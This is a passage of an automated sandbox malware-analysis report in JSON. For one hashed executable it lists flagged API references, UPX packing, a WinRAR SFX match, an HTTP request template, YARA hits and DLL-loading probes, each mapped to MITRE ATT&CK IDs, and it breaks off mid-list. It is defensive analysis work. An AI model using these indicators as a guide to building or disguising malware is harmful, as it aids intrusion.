\"CloseServiceHandle\" (Indicator: \"CloseServiceHandle\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"CloseServiceHandle\" (Indicator: \"CloseServiceHandle\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-209", "type": 2, "relevance": 1, "name": "Contains ability to start a service (API string)", "description": "Found reference to API \"StartServiceA\" (Indicator: \"StartService\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"StartServiceA\" (Indicator: \"StartService\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-191", "type": 2, "relevance": 1, "name": "Able to enumerate service (API string)", "description": "Found reference to API \"QueryServiceStatus\" (Indicator: \"QueryServiceStatus\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"OpenSCManagerA\" (Indicator: \"OpenSCManager\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"QueryServiceStatus\" (Indicator: \"QueryServiceStatus\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"OpenSCManagerA\" (Indicator: \"OpenSCManager\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter SHAutoComplete (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter GetTextExtentExPointWPri (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter CoRegisterInitializeSpy (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter CoRevokeInitializeSpy (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter CLSIDFromOle1Class (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter GetCatalogObject (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter GetCatalogObject2 (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter GetThemeMargins (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter BufferedPaintInit (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter BufferedPaintRenderAnimation (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter GetThemeTransitionDuration (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter BeginBufferedAnimation (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter IsThemeBackgroundPartiallyTransparent (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter DrawThemeParentBackgroundEx (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter EndBufferedAnimation (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter BeginBufferedPaint (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter EndBufferedPaint (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter DrawThemeParentBackground (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter GetThemeBackgroundContentRect (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter DrawThemeText (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter GetThemeTextExtent (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter BufferedPaintStopAllAnimations (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter BufferedPaintUnInit (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005280)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e003024d664@KERNELBASE.dll\"\n \"1000110092ae1677@ADVAPI32.DLL\"\n \"0d000e00e8ae1677@ADVAPI32.DLL\"\n \"0e000f0098204100@SHLWAPI.dll\"\n \"15001600c03e3d6b@ADVAPI32.DLL\"\n \"0e000f00703f3d6b@ADVAPI32.DLL\"\n \"0e000f00cc3f3d6b@ADVAPI32.DLL\"\n \"11001200b4473d6b@ADVAPI32.DLL\"\n \"1100120048483d6b@ADVAPI32.DLL\"\n \"120013008c483d6b@ADVAPI32.DLL\"\n \"12001300e4483d6b@ADVAPI32.DLL\"\n \"14001500386e3d6b@ADVAPI32.DLL\"\n \"14001500506e3d6b@ADVAPI32.DLL\"\n \"14001500686e3d6b@ADVAPI32.DLL\"\n \"17001800806e3d6b@ADVAPI32.DLL\"\n \"0d000e00986e3d6b@ADVAPI32.DLL\"\n \"11001200a86e3d6b@ADVAPI32.DLL\"\n \"11001200bc6e3d6b@ADVAPI32.DLL\"\n \"0d000e0044663d6b@WININET.dll\"\n \"0d000e00b4663d6b@WININET.dll\"\n \"10001100ec663d6b@WININET.dll\"\n \"1000110090673d6b@WININET.dll\"\n \"10001100006f3d6b@WININET.dll\"\n \"10001100146f3d6b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"CreateDirectoryA\" with parameter 433a (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"CreateDirectoryA\" with parameter C:\\ (UID: 00000000-00005280)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-2", "type": 10, "name": "Loads rich edit control libraries", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" loaded module \"%WINDIR%\\System32\\riched32.dll\" at 6C9F0000\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" loaded module \"%WINDIR%\\System32\\riched20.dll\" at 6AD20000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\" has an writable section named \"UPX0\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\" has an writable section named \"UPX1\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\" has an writable section named \".rsrc\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\" has an writable section named \".tc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\" has an executable section named \"UPX0\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\" has an executable section named \"UPX1\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\" has an executable section named \".tc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-322", "type": 2, "relevance": 1, "name": "Contains ability to move file or directory (API string)", "description": "Found reference to API \"MoveFileExA\" (Indicator: \"MoveFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"MoveFileA\" (Indicator: \"MoveFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"MoveFileA\" (Indicator: \"MoveFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"MoveFileExA\" (Indicator: \"MoveFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-550", "type": 2, "relevance": 1, "name": "Contains ability to find and load resources of specific modules (API string)", "description": "Found reference to API \"FindResourceA\" (Indicator: \"FindResource\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"FreeResource\" (Indicator: \"FreeResource\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"SizeofResource\" (Indicator: \"SizeofResource\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"LockResource\" (Indicator: \"LockResource\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"FindResourceA\" (Indicator: \"FindResource\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"FreeResource\" (Indicator: \"FreeResource\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"SizeofResource\" (Indicator: \"SizeofResource\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"LockResource\" (Indicator: \"LockResource\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-127", "type": 2, "relevance": 1, "name": "Found user-agent related strings", "description": "Found string \"GET %s?%s HTTP/1.1Connection: Keep-AliveHost: %sUser-Agent: Mozilla/4.0Accept-language: cn\" (Indicator: \"user-agent: \"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found string \"User-Agent: Mozilla/4.0\" (Indicator: \"user-agent: \"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-7", "type": 2, "relevance": 1, "name": "Contains PDB pathways", "description": "\"C:\\exe.pdb\"", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-220", "type": 2, "relevance": 1, "name": "Contains ability to create/control drivers (API string)", "description": "Found reference to API \"DeviceIoControl\" (Indicator: \"DeviceIoControl\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"DeviceIoControl\" (Indicator: \"DeviceIoControl\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-307", "type": 2, "relevance": 1, "name": "Contains ability to create/load registry keys (API string)", "description": "Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\system32\\ole32.dll\" [Source: 00000000-00005280-00000C28-1170677703]\n Observed system executable string:\"%WINDIR%\\system32\\MSCTF.dll\" [Source: 00000000-00005280-00000C28-1170958909]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" loaded module \"OLE32.DLL\" at base 76a00000\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 76a00000\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" loaded module \"CRYPTBASE.DLL\" at base 74d60000\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" loaded module \"CLBCATQ.DLL\" at base 75270000\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 76e90000\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" loaded module \"OLEAUT32.DLL\" at base 766d0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00005280)\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" called \"LoadLibrary\" with a parameter imageres.dll (UID: 00000000-00005280)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75650000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\" was detected as \"UPX\" and name: \"Packer\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\" was detected as \"Borland C++\" and name: \"Compiler\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\" was detected as \"Turbo Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: 234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-140", "type": 13, "relevance": 2, "name": "YARA signature match – Embedded PE executable", "description": "YARA signature matched on embedded PE in file \"sample.bin\"", "origin": "YARA Signature", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-103", "type": 13, "relevance": 5, "name": "YARA signature match - AES encryption", "description": "YARA signature for AES encryption matched on process \"00000000-00005280\"", "origin": "YARA Signature", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\" was detected as \"WinRAR 32-bit SFX Module\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-481", "type": 2, "relevance": 1, "name": "Reference explorer.exe process", "description": "Found string \"Explorer.exe\" (Indicator: \"explorer.exe\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found string \"explorer.exe\" (Indicator: \"explorer.exe\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\SspiCli.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\UxTheme.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\samcli.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\MSACM32.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\VERSION.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\sfc.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\sfc_os.DLL\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\MPR.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\riched32.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\RICHED20.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c.exe\" trying to access non-existent file \"C:\\imageres.dll\"\n 